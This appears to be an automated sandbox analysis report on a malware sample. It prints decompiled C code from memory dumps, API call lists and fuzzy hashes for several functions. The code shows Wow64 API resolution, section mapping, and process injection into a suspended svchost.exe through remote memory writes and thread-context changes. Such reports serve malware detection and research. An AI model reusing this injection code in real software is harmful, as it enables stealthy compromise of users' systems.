GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028,00000100,00000000,00000200), ref: 00AB31F8
GetProcAddress.KERNEL32(00000000), ref: 00AB31FF
NtWow64ReadVirtualMemory64.NTDLL(00000028,00000000,?,?,00000008,00000000,00000028,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028), ref: 00AB3227

Strings

ZwWow64ReadVirtualMemory64, xrefs: 00AB31EE
NTDLL.DLL, xrefs: 00AB31F3

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleMemory64ModuleProcReadVirtualWow64
String ID: NTDLL.DLL$ZwWow64ReadVirtualMemory64
API String ID: 148456037-3377366912
Opcode ID: 3cc836033bf5417a5fe39becdf5ad060ce2ee37cd81d5966cc351eaf3dd5635b
Instruction ID: cf6c6ef32093cf1c252cbc55c428d379515f34fee7e0d75b55bfe39af5fee163
Opcode Fuzzy Hash: 3cc836033bf5417a5fe39becdf5ad060ce2ee37cd81d5966cc351eaf3dd5635b
Instruction Fuzzy Hash: 0FF04936A00619BFCF099FA9EC04EDA7BBDEF0D314B008269F904E3121E73199508B91

Uniqueness

Uniqueness Score: -1.00%

Function 00AB318A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00AB318A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				_Unknown_base(*)()* _t6;
				void* _t7;
				void* _t10;

				_t6 =  *0xb16d80;
				_t10 = 0xc0000002;
				if(_t6 != 0) {
					L2:
					_t7 =  *_t6(_a4, _a8, _a12, _a16, _a20); // executed
					_t10 = _t7;
				} else {
					_t6 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "ZwWow64QueryInformationProcess64");
					 *0xb16d80 = _t6;
					if(_t6 != 0) {
						goto L2;
					}
				}
				return _t10;
			}

0x00ab318d
0x00ab3193
0x00ab319a
0x00ab31bc
0x00ab31cb
0x00ab31cd
0x00ab319c
0x00ab31ad
0x00ab31b3
0x00ab31ba
0x00000000
0x00000000
0x00ab31ba
0x00ab31d3

APIs

GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64QueryInformationProcess64,00000000,?,00AB2BC3,?,00000000,?,00000030,?,00000000,00000000), ref: 00AB31A6
GetProcAddress.KERNEL32(00000000), ref: 00AB31AD
NtWow64QueryInformationProcess64.NTDLL(00000000,?,00000030,?,00000000,00000000,?,00AB2BC3,?,00000000,?,00000030,?,00000000,00000000), ref: 00AB31CB

Strings

ZwWow64QueryInformationProcess64, xrefs: 00AB319C
NTDLL.DLL, xrefs: 00AB31A1

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleInformationModuleProcProcess64QueryWow64
String ID: NTDLL.DLL$ZwWow64QueryInformationProcess64
API String ID: 782493824-3633144524
Opcode ID: ff09bd33ec4f608eb7981c64b475d8849f9fa0eb7abd77a2820330c4b562aed0
Instruction ID: 7e31a19c9f13575dd49739edb1adbbf6d6d0ce8e6e88c07c6b0133a5a8a85304
Opcode Fuzzy Hash: ff09bd33ec4f608eb7981c64b475d8849f9fa0eb7abd77a2820330c4b562aed0
Instruction Fuzzy Hash: D5E0ED32600615AFCF02AFECAC09ADA3BADBB08755B444120FA08D6122D731CD219B90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2591, Relevance: 6.1, APIs: 4, Instructions: 80
nativeCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00AB2591(intOrPtr _a4, void** _a8, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				int _v28;
				long _v32;
				int _v36;
				int _v40;
				void* _v44;
				long _t27;
				long _t31;
				void* _t33;
				long _t36;
				intOrPtr* _t42;
				long _t43;

				asm("stosd");
				_v8 = 0;
				_v12 = 0;
				asm("stosd");
				_v16 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t27 = 0x40;
				_v32 = _t27;
				_v44 = 0x18;
				_v40 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				_t31 = NtCreateSection( &_v8, 0xf001f,  &_v44,  &_v20, _t27, 0x8000000, 0); // executed
				_t42 = _a12;
				if(_t31 < 0) {
					_t43 = RtlNtStatusToDosError(_t31);
					goto L5;
				} else {
					_t36 = E00AB27C1(_v8, 0xffffffff,  &_v12); // executed
					_t43 = _t36;
					if(_t43 != 0) {
						L5:
						_t33 = _v8;
					} else {
						memset(_v12, 0, _v20);
						 *_a8 = _v12;
						if(_t42 == 0) {
							goto L5;
						} else {
							_t33 = _v8;
							 *_t42 = _t33;
						}
					}
				}
				if(_t33 != 0 && _t42 == 0) {
					__imp__ZwClose(_t33);
				}
				return _t43;
			}

0x00ab259f
0x00ab25a4
0x00ab25a7
0x00ab25aa
0x00ab25ab
0x00ab25ae
0x00ab25af
0x00ab25b0
0x00ab25b4
0x00ab25b7
0x00ab25bf
0x00ab25c9
0x00ab25d9
0x00ab25dd
0x00ab25e0
0x00ab25e3
0x00ab25e6
0x00ab25ec
0x00ab25f1
0x00ab2633
0x00000000
0x00ab25f3
0x00ab25fc
0x00ab2601
0x00ab2608
0x00ab2635
0x00ab2635
0x00ab260a
0x00ab2611
0x00ab261f
0x00ab2623
0x00000000
0x00ab2625
0x00ab2625
0x00ab2628
0x00ab2628
0x00ab2623
0x00ab2608
0x00ab263a
0x00ab2641
0x00ab2641
0x00ab264f

APIs

NtCreateSection.NTDLL(?,000F001F,?,00AB19B8,00000040,08000000,00000000), ref: 00AB25E6
memset.NTDLL ref: 00AB2611
RtlNtStatusToDosError.NTDLL ref: 00AB262D
ZwClose.NTDLL(?), ref: 00AB2641

Part of subcall function 00AB27C1: NtMapViewOfSection.NTDLL(000000FF,?,00000040,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 00AB27EA
Part of subcall function 00AB27C1: RtlNtStatusToDosError.NTDLL ref: 00AB27F1

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorSectionStatus$CloseCreateViewmemset
String ID:
API String ID: 783833395-0
Opcode ID: 95dfd2509bdb48e0d0758a400aafecf67b4d63537f85ce88a09953ab80d8ce2e
Instruction ID: 26882d515521e23b3a52356096e64029069aedf9a52d2dd538819fc541b1a465
Opcode Fuzzy Hash: 95dfd2509bdb48e0d0758a400aafecf67b4d63537f85ce88a09953ab80d8ce2e
Instruction Fuzzy Hash: 2F21FA75D00619AFDB11DFA9C980AEEBBBCFF08350F20016AE914E7251E7359E048B90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB27C1, Relevance: 3.0, APIs: 2, Instructions: 25
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB27C1(void* _a4, void* _a8, PVOID* _a12) {
				long _v8;
				long _v12;
				void* _v16;
				long _t11;

				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t11 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
				return RtlNtStatusToDosError(_t11);
			}

0x00ab27d5
0x00ab27de
0x00ab27e4
0x00ab27ea
0x00ab27fa

APIs

NtMapViewOfSection.NTDLL(000000FF,?,00000040,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 00AB27EA
RtlNtStatusToDosError.NTDLL ref: 00AB27F1

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorSectionStatusView
String ID:
API String ID: 1313840181-0
Opcode ID: 0e1f3dd4c4eef65bc1b41761cc5fc3fe5cd9c49c527e4c906081bda3aa5e657a
Instruction ID: 968dcefa4a3faa21ab5c33efafc35a0c729b172cafb39e0a324fe61b2592d88f
Opcode Fuzzy Hash: 0e1f3dd4c4eef65bc1b41761cc5fc3fe5cd9c49c527e4c906081bda3aa5e657a
Instruction Fuzzy Hash: E8E07DB5D0020CBFEF05AF90DD0BEAEBB7CEB04300F10826ABD1556251E6B16A159B90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB27FB, Relevance: 3.0, APIs: 2, Instructions: 9
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB27FB(void* _a4, void* _a8) {
				long _t3;

				_t3 = NtUnmapViewOfSection(_a4, _a8); // executed
				return RtlNtStatusToDosError(_t3);
			}

0x00ab2804
0x00ab2812

APIs

NtUnmapViewOfSection.NTDLL(00AB1CCD,?), ref: 00AB2804
RtlNtStatusToDosError.NTDLL ref: 00AB280B

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorSectionStatusUnmapView
String ID:
API String ID: 507025375-0
Opcode ID: 3426fba7cba053acf5cd2d063d614908a764619ae81d11ec12bc986b981975b9
Instruction ID: a3e782b449066a3e46577fb4d752d5b8a9666a487232ce0353102fcee829c0c0
Opcode Fuzzy Hash: 3426fba7cba053acf5cd2d063d614908a764619ae81d11ec12bc986b981975b9
Instruction Fuzzy Hash: A2C04832800608FFCF017FE1EC089893F2DEB08361B108110FA0989072CB7295229FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB14B0, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111
processCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00AB14B0(void* __ecx, long __edx) {
				void _v1040;
				short _v1060;
				short _v1068;
				void _v1560;
				short _v1580;
				struct _STARTUPINFOW _v1656;
				struct _PROCESS_INFORMATION _v1672;
				void* _t24;
				void* _t27;
				int _t34;
				int _t45;
				void* _t53;
				long _t54;
				int _t55;
				void** _t57;
				void** _t58;
				void** _t59;

				_t54 = __edx;
				_t53 = __ecx;
				_t55 = 0;
				_t24 = E00AB2813(_t53, GetModuleHandleA(0), 3); // executed
				_t57 =  &(( &(_v1672.hThread))[2]);
				if(_t24 == 0) {
					asm("xorps xmm0, xmm0");
					asm("cdq");
					asm("movups [esp+0xc], xmm0");
					_v1672.hThread = 0xab6000;
					_v1672.dwProcessId = _t54;
					_v1656.lpReserved = 0x2b000;
					if(( *0xb16d44 & 0x00000001) != 0) {
						_v1656.lpDesktop = 0x35800;
						asm("cdq");
						_v1672.dwThreadId = 0xae1000;
						_v1656.cb = _t54;
					}
					_t27 = E00AB1A48(_t53,  &(_v1672.hThread), 0);
					_t58 =  &(_t57[2]);
					if(_t27 == 0) {
						E00AB32D6(_t27);
						memset( &_v1560, 0, 0x208);
						memset( &_v1040, 0, 0x410);
						_t59 =  &(_t58[7]);
						_t34 =  &_v1560;
						__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t34); // executed
						if(_t34 == 0) {
							asm("xorps xmm0, xmm0");
							asm("movups [esp+0x28], xmm0");
							memset( &(_v1656.lpTitle), _t34, 0x40);
							_t59 =  &(_t59[3]);
							_v1656.lpDesktop = 0x44;
							PathCombineW( &_v1060,  &_v1580, L"svchost.exe -k");
							_t45 = CreateProcessW(0,  &_v1068, 0, 0, 0, 0x4000004, 0, 0,  &_v1656,  &_v1672); // executed
							_t55 = _t45;
							if(_t55 != 0) {
								E00AB18AD(_t53, _t54,  &_v1672, 4, 1); // executed
								_t59 =  &(_t59[3]);
								asm("sbb edi, edi");
								_t55 = _t55 + 1;
								CloseHandle(_v1672.hThread);
								CloseHandle(_v1672);
							}
						}
						E00AB18AC(E00AB32D6(1));
					}
					return _t55;
				} else {
					return 0;
				}
			}

0x00ab14b0
0x00ab14b0
0x00ab14b9
0x00ab14c3
0x00ab14c8
0x00ab14cd
0x00ab14e5
0x00ab14e8
0x00ab14e9
0x00ab14ee
0x00ab14f2
0x00ab14f6
0x00ab14fe
0x00ab1505
0x00ab150d
0x00ab150e
0x00ab1512
0x00ab1512
0x00ab151d
0x00ab1522
0x00ab1527
0x00ab152e
0x00ab153f
0x00ab1553
0x00ab1558
0x00ab155b
0x00ab1568
0x00ab1570
0x00ab157d
0x00ab1581
0x00ab1586
0x00ab158b
0x00ab158e
0x00ab15a8
0x00ab15d1
0x00ab15d7
0x00ab15db
0x00ab15e6
0x00ab15eb
0x00ab15f0
0x00ab15f2
0x00ab15f7
0x00ab1601
0x00ab1601
0x00ab15db
0x00ab1611
0x00ab1611
0x00ab161f
0x00ab14cf
0x00ab14d8
0x00ab14d8

APIs

GetModuleHandleA.KERNEL32(00000000,00000003), ref: 00AB14BC

Part of subcall function 00AB2813: GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB2826
Part of subcall function 00AB2813: GetVersion.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2839
Part of subcall function 00AB2813: GetCurrentProcessId.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2849
Part of subcall function 00AB2813: StrRChrA.SHLWAPI(00000000,0000005C,?,?,?,00AB14C8,00000000), ref: 00AB28B5
Part of subcall function 00AB2813: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB28CB
Part of subcall function 00AB2813: GetLastError.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB28DA

memset.NTDLL ref: 00AB153F
memset.NTDLL ref: 00AB1553
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00AB1568
memset.NTDLL ref: 00AB1586
PathCombineW.SHLWAPI(?,?,svchost.exe -k), ref: 00AB15A8
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000004,00000000,00000000,?,?), ref: 00AB15D1
CloseHandle.KERNEL32(?), ref: 00AB15F7
CloseHandle.KERNEL32(?), ref: 00AB1601

Strings

6$u, xrefs: 00AB1568
svchost.exe -k, xrefs: 00AB159A
D, xrefs: 00AB158E

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Handle$memset$CloseCreateModulePathProcess$CombineCurrentErrorEventFolderLastVersion
String ID: 6$u$D$svchost.exe -k
API String ID: 2129906036-3607948105
Opcode ID: fc9c4a30c62d5a77db9a46cbd53afd801b4ef2a485024108ae85022696847823
Instruction ID: 82b497e8f8b004ac073703baed38f93c11a5b4925226df874277bbb0329934aa
Opcode Fuzzy Hash: fc9c4a30c62d5a77db9a46cbd53afd801b4ef2a485024108ae85022696847823
Instruction Fuzzy Hash: 143107B1A443407BE720EBA0DC0AFDB77DCAFC8700F544A29B644D60D2EB74D1488756

Uniqueness

Uniqueness Score: -1.00%

Function 00AB18AD, Relevance: 15.1, APIs: 10, Instructions: 133
threadsleepinjectionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00AB18AD(void* __ecx, void* __edx, intOrPtr* _a4, signed char _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				long _v16;
				char _v20;
				intOrPtr _v24;
				void _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				void* _t51;
				long _t58;
				long _t63;
				void* _t65;
				void* _t66;
				void* _t73;
				long _t75;
				intOrPtr* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_t73 = __edx;
				_t66 = __ecx;
				memset( &_v744, 0, 0x2cc);
				_t76 = _a4;
				_t65 = 0;
				_v20 = 0xccccfeeb;
				_v12 =  *_t76;
				_t42 =  *0xb16d54; // 0x0
				_v24 = _t42;
				_t43 = E00AB3003(_t66,  *((intOrPtr*)(_t76 + 8)), 0);
				_t78 = _t77 + 0x14;
				if(_t43 == 0) {
					if(( *0xb16d44 & 0x00000001) == 0) {
						goto L2;
					} else {
						if(_a12 != 0) {
							L14:
							_push(_a12);
							_push(_t65);
							_push(_t76); // executed
							_t63 = E00AB220D(_t73); // executed
							_t75 = _t63;
							goto L17;
						} else {
							_t65 = E00AB3127( *0xb16d54);
							if(_t65 == 0) {
								goto L18;
							} else {
								goto L14;
							}
						}
					}
				} else {
					_push(0x10);
					_pop(0);
					L2:
					_push(0);
					_v744.ContextFlags = 0x10003;
					_t44 = E00AB1CE6( *_t76);
					_v8 = _t44;
					_t70 =  &_v28;
					if(ReadProcessMemory(_v12, _t44,  &_v28, 4,  &_v16) == 0 || _v16 != 4) {
						L18:
						_t75 = GetLastError();
					} else {
						_t51 = E00AB1F33( &_v28, _v12, _v8,  &_v20, 4);
						_t79 = _t78 + 0x10;
						if(_t51 != 0) {
							_a4 = 0x1770;
							while(1) {
								ResumeThread( *(_t76 + 4));
								Sleep(0x12c);
								SuspendThread( *(_t76 + 4));
								_a4 = _a4 - 0x12c;
								if(GetThreadContext( *(_t76 + 4),  &_v744) == 0) {
									goto L18;
								}
								if(_a4 <= 0 || _v744.Eip == _v8) {
									_push(0);
									if(_a12 == _t65) {
										_push(_v24);
										_push(_t76);
										_t58 = E00AB2E6D(_t70, _t73);
										_t79 = _t79 + 0xc;
									} else {
										_t58 = E00AB1B12(_t65, _t73);
										_t70 = _t76;
									}
									_t75 = _t58;
									SwitchToThread();
									E00AB1F33(_t70, _v12, _v8,  &_v28, 4);
									L17:
									if(_t75 == 0xffffffff) {
										goto L18;
									}
								} else {
									continue;
								}
								goto L19;
							}
						}
						goto L18;
					}
				}
				L19:
				if((_a8 & 0x00000004) == 0) {
					ResumeThread( *(_t76 + 4));
				}
				if(_t65 != 0) {
					LocalFree(_t65);
				}
				return _t75;
			}

0x00ab18ad
0x00ab18ad
0x00ab18c8
0x00ab18cd
0x00ab18d0
0x00ab18d3
0x00ab18df
0x00ab18e2
0x00ab18e7
0x00ab18ea
0x00ab18ef
0x00ab18f4
0x00ab19c3
0x00000000
0x00ab19c9
0x00ab19cc
0x00ab19e0
0x00ab19e0
0x00ab19e3
0x00ab19e4
0x00ab19e5
0x00ab19ed
0x00000000
0x00ab19ce
0x00ab19d9
0x00ab19de
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab19de
0x00ab19cc
0x00ab18fa
0x00ab18fa
0x00ab18fc
0x00ab18fd
0x00ab18fd
0x00ab1900
0x00ab190a
0x00ab1914
0x00ab191a
0x00ab192a
0x00ab1a1e
0x00ab1a24
0x00ab193a
0x00ab1946
0x00ab194b
0x00ab1950
0x00ab195b
0x00ab195e
0x00ab1961
0x00ab196c
0x00ab1975
0x00ab197b
0x00ab1994
0x00000000
0x00000000
0x00ab199f
0x00ab19ac
0x00ab19b0
0x00ab19f1
0x00ab19f4
0x00ab19f5
0x00ab19fa
0x00ab19b2
0x00ab19b3
0x00ab19b9
0x00ab19b9
0x00ab19fd
0x00ab19ff
0x00ab1a11
0x00ab1a19
0x00ab1a1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab199f
0x00ab195e
0x00000000
0x00ab1950
0x00ab192a
0x00ab1a26
0x00ab1a2a
0x00ab1a2f
0x00ab1a2f
0x00ab1a37
0x00ab1a3a
0x00ab1a3a
0x00ab1a47

APIs

memset.NTDLL ref: 00AB18C8

Part of subcall function 00AB3003: GetModuleHandleW.KERNEL32(KERNEL32.DLL,IsWow64Process,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB301E
Part of subcall function 00AB3003: GetProcAddress.KERNEL32(00000000), ref: 00AB3025
Part of subcall function 00AB3003: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB3045
Part of subcall function 00AB3003: FindCloseChangeNotification.KERNELBASE(00AB14C8,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB306E

ReadProcessMemory.KERNEL32(?,00000000,?,00000004,?,?,?,00000000), ref: 00AB1922

Part of subcall function 00AB1F33: VirtualProtectEx.KERNEL32(CCCCFEEB,?,00AB194B,00000004,00000004,00000000,?,?,?,?,00AB194B,?,?,CCCCFEEB,00000004), ref: 00AB1F4C
Part of subcall function 00AB1F33: WriteProcessMemory.KERNEL32(CCCCFEEB,?,?,00AB194B,CCCCFEEB,?,?,?,00AB194B,?,?,CCCCFEEB,00000004,?,?,00000000), ref: 00AB1F64
Part of subcall function 00AB1F33: VirtualProtectEx.KERNEL32(CCCCFEEB,?,00AB194B,00000004,00000004,?,?,?,00AB194B,?,?,CCCCFEEB,00000004,?,?,00000000), ref: 00AB1F85

ResumeThread.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00AB1961
Sleep.KERNEL32(0000012C,?,?,?,?,?,?,00000000), ref: 00AB196C
SuspendThread.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00AB1975
GetThreadContext.KERNEL32(?,00010003,?,?,?,?,?,?,00000000), ref: 00AB198C
SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00AB19FF
GetLastError.KERNEL32(?,?,00000000), ref: 00AB1A1E
ResumeThread.KERNEL32(?,?,?,00000000), ref: 00AB1A2F
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00AB1A3A

Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F), ref: 00AB1D26
Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,?,00000000,00001000,00000000,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1D46
Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,00008664,?,00000018,00000000), ref: 00AB1D93
Part of subcall function 00AB1CE6: ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000), ref: 00AB1DB1
Part of subcall function 00AB1CE6: LocalFree.KERNEL32(00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1DC2

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$Memory$ReadThread$FreeLocalProtectResumeVirtual$AddressChangeCloseContextErrorFindHandleLastModuleNotificationOpenProcSleepSuspendSwitchWritememset
String ID:
API String ID: 1819368984-0
Opcode ID: 06e2f1ec336c8070d210e8c17519d87ca0fcc9e633c6c2044f80472e1ebec275
Instruction ID: c35e04d6f0813e8662f3936690e293beb2c65d6699a0aea89a49a691b5d5e6b1
Opcode Fuzzy Hash: 06e2f1ec336c8070d210e8c17519d87ca0fcc9e633c6c2044f80472e1ebec275
Instruction Fuzzy Hash: 6B41DF72A00249AFDF21EFA0ED55AEE7BBCFF05350F440069FA0492162EB319A50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2C02, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00AB2C02(void* __ecx, void* __eflags, intOrPtr _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				signed int _v8;
				char* _v12;
				void* _t30;
				void* _t34;
				CHAR* _t37;
				int _t41;
				char* _t42;
				long _t50;
				intOrPtr* _t52;
				intOrPtr* _t53;
				signed int _t55;
				long _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				void* _t64;

				_push(2);
				E00AB3509(_a4, 0, 0,  &_v8); // executed
				_t57 = _v8;
				_t64 = _t63 + 0x10;
				_v12 = _t57;
				_t30 = VirtualAlloc(0, _t57, 0x3000, 4); // executed
				_t61 = _t30;
				if(_t61 == 0) {
					L16:
					_push(8);
					_pop(0);
					L17:
					if(_t61 != 0) {
						VirtualFree(_t61, 0, 0x8000); // executed
					}
					return 0;
				}
				_t50 = _t57;
				while(1) {
					_t34 = E00AB3509(_a4, _t61, _t57,  &_v8); // executed
					_t57 = _v8;
					_t64 = _t64 + 0x10;
					if(_t34 != 0 || _t50 >= _t57) {
						break;
					}
					_t50 = _t57;
					_v12 = _t50;
					VirtualFree(_t61, 0, 0x8000);
					_t61 = VirtualAlloc(0, _t57, 0x3000, 4);
					if(_t61 != 0) {
						continue;
					}
					break;
				}
				_push(2);
				_pop(0);
				if(_t61 == 0 || _v12 < _t57) {
					goto L16;
				} else {
					_v8 = _v8 & 0x00000000;
					_t12 = _t61 + 8; // 0x8
					_t59 = _t12;
					if( *_t61 <= 0) {
						goto L17;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						_t37 = ( *(_t59 + 0x1e) & 0x0000ffff) + 0x20 + _t59;
						_v12 = _t37;
						if(_a8 == 0) {
							break;
						}
						_t41 = lstrcmpiA(_t37, _a8); // executed
						if(_t41 == 0) {
							break;
						}
						_t42 = StrChrA(_v12, 0x2e);
						if(_t42 == 0) {
							L12:
							_t59 = _t59 + 0x120;
							_t55 = _v8 + 1;
							_v8 = _t55;
							if(_t55 <  *_t61) {
								continue;
							}
							goto L17;
						}
						 *_t42 = 0;
						if(lstrcmpiA(_v12, _a8) == 0) {
							break;
						}
						goto L12;
					}
					_t52 = _a12;
					 *_t52 =  *((intOrPtr*)(_t59 + 8));
					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t59 + 0xc));
					_t53 = _a16;
					if(_t53 != 0) {
						 *_t53 =  *((intOrPtr*)(_t59 + 0x10));
					}
					goto L17;
				}
			}

0x00ab2c0a
0x00ab2c18
0x00ab2c1d
0x00ab2c20
0x00ab2c23
0x00ab2c30
0x00ab2c36
0x00ab2c3a
0x00ab2d16
0x00ab2d16
0x00ab2d18
0x00ab2d19
0x00ab2d1b
0x00ab2d25
0x00ab2d25
0x00ab2d33
0x00ab2d33
0x00ab2c40
0x00ab2c42
0x00ab2c4b
0x00ab2c50
0x00ab2c53
0x00ab2c58
0x00000000
0x00000000
0x00ab2c65
0x00ab2c68
0x00ab2c6b
0x00ab2c81
0x00ab2c85
0x00000000
0x00000000
0x00000000
0x00ab2c85
0x00ab2c87
0x00ab2c89
0x00ab2c8c
0x00000000
0x00ab2c97
0x00ab2c97
0x00ab2c9b
0x00ab2c9b
0x00ab2ca1
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab2ca3
0x00ab2ca3
0x00ab2caa
0x00ab2cb0
0x00ab2cb3
0x00000000
0x00000000
0x00ab2cb9
0x00ab2cc1
0x00000000
0x00000000
0x00ab2cc8
0x00ab2cd0
0x00ab2ce5
0x00ab2ce8
0x00ab2cee
0x00ab2cef
0x00ab2cf4
0x00000000
0x00000000
0x00000000
0x00ab2cf6
0x00ab2cd5
0x00ab2ce3
0x00000000
0x00000000
0x00000000
0x00ab2ce3
0x00ab2cf8
